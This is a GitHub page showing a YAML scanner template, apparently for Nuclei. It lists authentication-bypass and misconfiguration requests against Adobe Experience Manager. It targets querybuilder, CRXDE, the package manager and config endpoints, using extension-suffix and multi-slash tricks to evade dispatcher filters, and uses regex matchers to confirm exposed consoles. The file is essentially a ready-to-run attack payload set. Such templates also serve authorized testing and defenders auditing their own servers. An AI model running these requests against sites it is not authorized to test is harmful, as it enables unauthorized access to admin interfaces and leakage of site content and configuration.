-
Notifications
You must be signed in to change notification settings - Fork 2
/
AEM_misconfig.yaml
33 lines (31 loc) · 1.43 KB
/
AEM_misconfig.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
id: aem-misconfigs
info:
name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with
author: panch0r3d
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/apps/system/config/.tidy.-1.json?.css"
- "{{BaseURL}}/bin/querybuilder.json?path=/apps/system/config&p.hits=full&p.limit=-1?.js"
- "{{BaseURL}}/crx/de/index.jsp?.js"
- "{{BaseURL}}/crx/explorer/browser/index.jsp?.css"
- "{{BaseURL}}/crx/packmgr/index.jsp?.json"
- "{{BaseURL}}/bin/querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
- "{{BaseURL}}/bin/querybuilder.json?p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000&p.start=1?.js"
- "{{BaseURL}}/libs/granite/core/content/login.html?.ico"
- "{{BaseURL}}/etc/reports/diskusage.html?.html"
- "{{BaseURL}}///crx///de///index.jsp?.css"
- "{{BaseURL}}///bin///querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
matchers-condition: and
matchers:
- type: regex
regex:
- '(success).*?["][:](true).*?["](results)'
- '(CRXDE).(Lite)'
- '(Content).(Explorer)'
- '(CRX).(Package).(Manager)'
- '(Adobe)'
part: body